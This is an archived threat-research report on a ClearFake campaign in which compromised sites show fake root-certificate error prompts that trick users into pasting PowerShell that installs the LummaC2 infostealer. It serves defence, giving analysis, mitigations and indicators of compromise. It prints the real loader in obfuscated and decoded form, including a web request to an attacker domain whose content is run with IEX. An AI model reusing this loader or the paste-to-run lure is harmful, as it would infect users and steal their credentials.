{
	"id": "af8fc0e6-2093-47ef-9062-964059b40e03",
	"created_at": "2026-04-06T00:19:42.257358Z",
	"updated_at": "2026-04-10T03:20:32.637836Z",
	"deleted_at": null,
	"sha1_hash": "37f48cf0b9f3b5b1d703e9290050ef665b180ded",
	"title": "New Execution Technique in ClearFake Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 640877,
	"plain_text": "New Execution Technique in ClearFake Campaign\r\nBy ReliaQuest Threat Research Team 31 May 2024\r\nPublished: 2024-05-31 · Archived: 2026-04-05 14:05:26 UTC\r\nKey Points\r\nReliaQuest observed new execution techniques in a campaign from the JavaScript framework “ClearFake,”\r\ntricking users into copying, pasting, and manually executing malicious PowerShell code.\r\nUpon execution, the PowerShell code performs multiple functions, including clearing the DNS cache,\r\ndisplaying a message box, downloading further PowerShell code, and installing “LummaC2” malware.\r\nThis new execution technique of instructing users to manually execute malicious code can bypass existing\r\ntechnical controls and detections.\r\nTo protect against this developing threat, organizations should block indicators of compromise (IoCs) and\r\nlimit PowerShell to users who need it for their daily job functions. The attack relies on social engineering\r\ntechniques to obtain initial access; therefore, it is also important to educate users on the new methods being\r\nemployed by threat actors to trick them into downloading malware.\r\nIn May 2024, ReliaQuest discovered a campaign from the JavaScript framework “ClearFake” that uses new\r\nexecution techniques: The adversary tricks users into manually copying and executing malicious code in\r\nPowerShell. This differs from the typical drive-by downloads frequently observed with ClearFake and other “fake\r\nbrowser update”–associated distribution campaigns, in which the victim is tricked into downloading and executing\r\na malicious payload. This new technique is designed to evade detection by security tools, as it involves the user\r\nmanually running the malicious PowerShell commands directly, as opposed to being invoked by a script file\r\ndownloaded and executed by the user. The campaign then deploys a multi-stage malware infection using\r\nPowerShell and sandbox evasion techniques that leads to the installation of the LummaC2 infostealer malware.\r\nAs this campaign requires users to manually execute PowerShell code themselves, this technique will likely have\r\na lower chance of tricking users. However, it may result in more severe consequences, because successful\r\nexecution could result in detections and controls being bypassed. Security teams need to be aware of this new\r\nexecution technique, review current controls to restrict PowerShell use, and educate users to not copy and paste\r\ncode into the PowerShell or Windows Command Shell consoles.\r\nIn this report, we will break down the stages of this latest ClearFake campaign, delve into the use cases we\r\nobserved, and provide mitigations that organizations can implement to protect against this emerging threat.\r\nWhat Is ClearFake?\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 1 of 8\n\nClearFake is a JavaScript framework known to use drive-by downloads and social engineering techniques, often\r\npresenting fake “browser update” pages to users.\r\nThese attacks work by driving traffic to websites that mimic legitimate ones, then presenting users with a page\r\nclaiming that they need to perform a browser update to view the site’s content.\r\nThe goal is typically to get users to download malicious files, leading to data theft or deployment of further\r\nmalware.\r\nAttack Flow\r\nOn May 26, 2024, we first identified attacks on our customer base that began with users visiting a compromised\r\nwebsite hosting a fake browser error prompt that asks the user to install a root certificate to fix the issue. The\r\nwebsites we observed in these incidents belonged to legitimate businesses that were likely compromised through\r\nvulnerabilities allowing code to be injected. The error prompt instructs the user to manually execute malicious\r\nPowerShell code, which subsequently installs LummaC2 (see Figure 1).\r\nFigure 1: Attack flow\r\nAttack Analysis\r\nThe prompt on the compromised sites indicates that the content cannot be displayed properly and instructs users to\r\ninstall a “root certificate” to resolve the issue by clicking a “Fix it” button (see Figure 2).\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 2 of 8\n\nFigure 2: First fake update prompt\r\nAfter clicking “How to fix,” another prompt appears that contains instructions for installing the root certificate.\r\nThe message features a “copy” button that, when clicked, copies obfuscated malicious PowerShell code into the\r\nuser’s clipboard (see Figure 3). Next, the user is guided through several steps to open a PowerShell terminal and\r\npaste in the code, which then automatically executes.\r\nThis stage—tricking the user to run the malicious PowerShell manually—represents the noteworthy aspect of this\r\ncampaign. The method bypasses signatures and detections, including suspicious parent–child process\r\nrelationships, malicious file downloads, and Mark-of-the-Web signatures. The initial PowerShell execution runs\r\nunder explorer.exe with no parent process and without prior command lines.\r\nFigure 3: Second fake update prompt\r\nIn each instance, the PowerShell code copied by the user was obfuscated using base64 encoding. Decoding the\r\nbase64 reveals malicious PowerShell code:\r\nObfuscated PowerShell Code\r\nipconfig /flushdns\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 3 of 8\n\n$VBrowser = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String\r\n(“JGpvYiA9IFN0YXJ0LUpvYiAtU2NyaXB0QmxvY2sgewogICAgQWRkLVR5cGUgLUFzc2VtY\r\nmx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtcwogICAgW1N5c3RlbS5XaW5kb3dzLkZvcm1z \r\nLk1lc3NhZ2VCb3hdOjpTaG93KCJUaGUgb3BlcmF0aW9uIGNvbXBsZXRlZCBzdWNjZXNzZn\r\nVsbHksIHBsZWFzZSByZWxvYWQgdGhlIHBhZ2UiLCAiU3lzdGVtIiwgMCwgNjQpCn0KCiRn\r\nOTFGID0gJ2h0dHBzOi8vcnRhdHRhY2suYmFxZWJlaTEub25saW5lL2RmL3R0JwokdjM4Sy\r\nA9IEB7ICdVc2VyLUFnZW50JyA9ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOy\r\nBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDa\r\nHJvbWUvMTAyLjAuMC4wIFNhZmFyaS81MzcuMzYnIH0KJHowNFEgPSBJbnZva2UtV2ViUm\r\nVxdWVzdCAtVXJpICRnOTFGIC1Vc2VCYXNpY1BhcnNpbmcgLUhlYWRlcnMgJHYzOEsKCklFW\r\nCAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJHowNFEuQ29ud\r\nGVudCkpCgpjbGVhci1ob3N0Owo=”));\r\n$Update = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String\r\n(“U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==”));\r\n$VER = $VBrowser + “; ” + $Update;\r\nInvoke-Expression $VER;\r\nexit;\r\nDecoded PowerShell Code\r\nipconfig /flushdns\r\n$VBrowser = $job = Start-Job -ScriptBlock {\r\nAdd-Type -AssemblyName System[dot]windows.Forms\r\n[System[dot]windows.Forms.MessageBox]::Show(“The operation completed successfully, please reload the\r\npage”, “System”, 0, 64)\r\n}\r\n$g91F = ‘hxxps://rtattack.baqebei1[dot]online/df/tt’\r\n$v38K = @{ ‘User-Agent’ = ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/102.0.0.0 Safari/537.36’ }\r\n$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K\r\nIEX ([System.Text.Encoding]::UTF8.GetString($z04Q.Content))\r\nclear-host;\r\n$update = Set-Clipboard -Value ” “;\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 4 of 8\n\n$VER = $VBrowser + “; ” + $Update;\r\nInvoke-Expression $VER;\r\nWhen pasted into the PowerShell terminal, the code conducts the below execution:\r\n1. Executes “ipconfig /flushdns.” This is likely intended to clear the device DNS cache of the previously\r\nvisited infected site, which instructs the user to reload the webpage after executing the PowerShell.\r\n2. Starts a background job that uses the Windows .NET MessageBox Class to produce a message box stating:\r\n“The operation completed successfully, please reload the page.”\r\n3. Assigns the URL “hxxps://rtattack.baqebei1[dot]online/df/tt” to the variable “$g91F.”\r\n4. Assigns the user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/102.0.0.0 Safari/537.36” to the variable “$v38K.”\r\n5. Invokes a web request with the previously assigned URL and user agent and stores the response in\r\n“$z04Q.”\r\n6. Executes the retrieved content stored in the variable “$z04Q” with the “Invoke-Expression” (IEX)\r\ncommand.\r\n7. Clears the PowerShell screen.\r\n8. Clears the user’s clipboard.\r\n9. Combines the contents of the variables “$VBrowser” and “$Update” that is assigned to “$VER”, which are\r\nthen executed with Invoke-Expression to run the previous code.\r\nSandbox Evasion\r\nWhen the PowerShell script is executed, the attacker-controlled domain conducts a user agent check. If the correct\r\nuser agent is supplied, a second PowerShell script is downloaded. The PowerShell script checks the infected\r\ndevice’s CPU temperature, and, if the result is null, execution is terminated. The CPU temperature check is a form\r\nof sandbox evasion since virtual machines will not return a value. If a CPU temperature value is returned,\r\nexecution continues and a ZIP file is downloaded from the domain “cdnforfiles[.]xyz.” The ZIP file contains the\r\nlegitimate “MediaInfo.exe” file and the malicious DLL “MediaInfo_i386.dll.” The PowerShell script executes any\r\nfiles with a “.exe” extension, which subsequently executes MediaInfo.exe and the malicious DLL via DLL\r\nsideloading. Upon successful execution, LummaC2 is installed as an executable file.\r\nCase Studies\r\nIn this section, we explore two case studies ReliaQuest observed as part of the new ClearFake campaign.\r\nCase Study 1\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 5 of 8\n\nA user visited an infected website that referenced the attacker-controlled domain “d1x9q8w2e4[.]xyz” to produce\r\nthe fake update prompt. The user copied the malicious PowerShell code into the PowerShell console and executed\r\nit. The second stage download attempt was blocked by technical controls, preventing any traffic to the second\r\ndomain “rtattack.baqebei1[dot]online,” thereby preventing further infection.\r\nReliaQuest detected the download attempt and proactively blocked the hash value of the next PowerShell file\r\nintended for download. The organization permits PowerShell execution on the user’s host, enabling the user to\r\ncopy, paste, and execute the malicious code. Technical controls stopped the second download stage; however,\r\nfurther restricting the user of PowerShell and the user being made aware of the threat could have prevented initial\r\nexecution.\r\nCase Study 2\r\nA user visited an infected website referencing the attacker-controlled domain “dnforfiles[.]xyz” to inject the\r\nupdate prompt. The user followed the instructions to copy and paste the malicious PowerShell code into a console.\r\nThe following infection chain occurred successfully:\r\n1. The PowerShell execution was successful, and the infected device contacted the domain\r\n“rtattack.baqebei1[.]online/df/tt” to download the next PowerShell file.\r\n2. The second PowerShell file executed successfully and downloaded the ZIP file “data.zip” to the path\r\n“C:\\Users\u003cusername\u003e\\AppData\\Local\\Temp\\data.zip.” The ZIP file “data.zip” contains the files\r\n“billhead.ai,” “MediaInfo.exe,” and “MediaInfo_i386.dll”.\r\n3. The PowerShell script then extracts the ZIP file contents and executes any files with the “.exe” extension.\r\nThis runs the legitimate “MediaInfo.exe” program and the malicious DLL “MediaInfo_i386.dll,” which\r\ninstalled LummaC2.\r\nReliaQuest detected the LummaC2 malware and performed triage of the incident. The ReliaQuest technical\r\noperations team used GreyMatter Respond to ban the hash values of the malicious files and block the attacker-controlled domains and IP addresses. We recommended the organization perform a full wipe and re-image of the\r\ninfected host from a known good backup to remove any persistence gained by the malware and change the\r\nimpacted user’s credentials out of precaution. This case study provides further evidence of the importance of\r\nrestricting users from executing applications such as PowerShell and limiting PowerShell execution when\r\nnecessary. Networking controls could have blocked connections to the anomalous top-level domain “.xyz,”\r\npreventing further infection if implemented.\r\nWhat ReliaQuest Is Doing\r\nTo identify malicious activity associated with ClearFake, ReliaQuest offers the detection rules to customers.\r\nAssociated GreyMatter Respond Plays can be executed to perform remediation by ReliaQuest customers or on\r\ntheir behalf by the ReliaQuest team.\r\nRecommendations and Best Practices\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 6 of 8\n\nIn addition to the detection rules cited above, we offer the following general recommendations and best practices\r\nto protect against the campaign detailed in this report.\r\nDeploy application control policies to restrict the execution of PowerShell scripts to only those users who\r\nneed it for their job functions.\r\nEnhance user awareness by notifying users, IT personnel, and security teams about this ongoing campaign.\r\nRemind users of the threats of copying and executing code from untrusted sources.\r\nRegularly update and patch websites and third-party tools used in sites to prevent exploitation of\r\nvulnerabilities that could allow code injection and unauthorized script execution.\r\nImplement policies on network proxy devices to block access to newly registered domains, especially those\r\nwith suspicious top-level domains (TLDs) such as .xyz, which are often used by threat actors to distribute\r\nmalicious content.\r\nSet Windows Defender Application Control (WDAC) to the most restrictive level possible. WDAC forces\r\nPowerShell to run in constrained language mode, which restricts PowerShell functions commonly abused\r\nby malware.\r\nVerify that deployed endpoint detection and antimalware security tools are integrated with the Windows\r\nAntimalware Scan Interface (AMSI). AMSI intercepts script commands, including PowerShell before\r\nexecution and uses antivirus software to analyze the commands.\r\nEnsure PowerShell execution policies are not set to unrestricted or undefined to prevent the execution of\r\nmalicious scripts.\r\nIndicators of Compromise\r\nThe below IoCs have been proactively added to the GreyMatter Intel feed for ReliaQuest customers.\r\nHashes\r\na467302da10ace0bf96963bcd6bdcd6a4e619e28cd477612988276dfee9f429e\r\n4d417cff26e83e096f6c161a10d6a72774b8bbc8948bf5b6d3156e6f17adac5f\r\n4a058f08157863034a6df89cddc13e81a561eb9ca0e955f4fe38f4ba7b4fa9f7\r\n44a45c396516a3f2705eaf9751a06d346fcae1864f5521356349ce85e78fd386\r\nAttacker-Controlled Domains\r\nbaqebei1[.]online\r\ncdnforfiles[.]xyz\r\nd1x9q8w2e4[.]xyz\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 7 of 8\n\nAttacker-Controlled IP Addresses\r\n104[.]21[.]29[.]92\r\n172[.]67[.]148[.]183\r\n188[.]114[.]97[.]7\r\nInfected Websites\r\nlambhuaexpress[.]in\r\nsoundmine[.]me\r\nhelena[.]pe\r\nrijas[.]com\r\nnavigatingthisspace[.]com\r\nsportrealeyes[.]it\r\nareadeturismo[.]tur[.]ar\r\nth3sport24[.]com\r\nmanchac[.]com\r\ntonitto[.]com\r\naedjakodu24[.]ee\r\nSource: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nhttps://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/"
	],
	"report_names": [
		"new-execution-technique-in-clearfake-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434782,
	"ts_updated_at": 1775791232,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/37f48cf0b9f3b5b1d703e9290050ef665b180ded.pdf",
		"text": "https://archive.orkl.eu/37f48cf0b9f3b5b1d703e9290050ef665b180ded.txt",
		"img": "https://archive.orkl.eu/37f48cf0b9f3b5b1d703e9290050ef665b180ded.jpg"
	}
}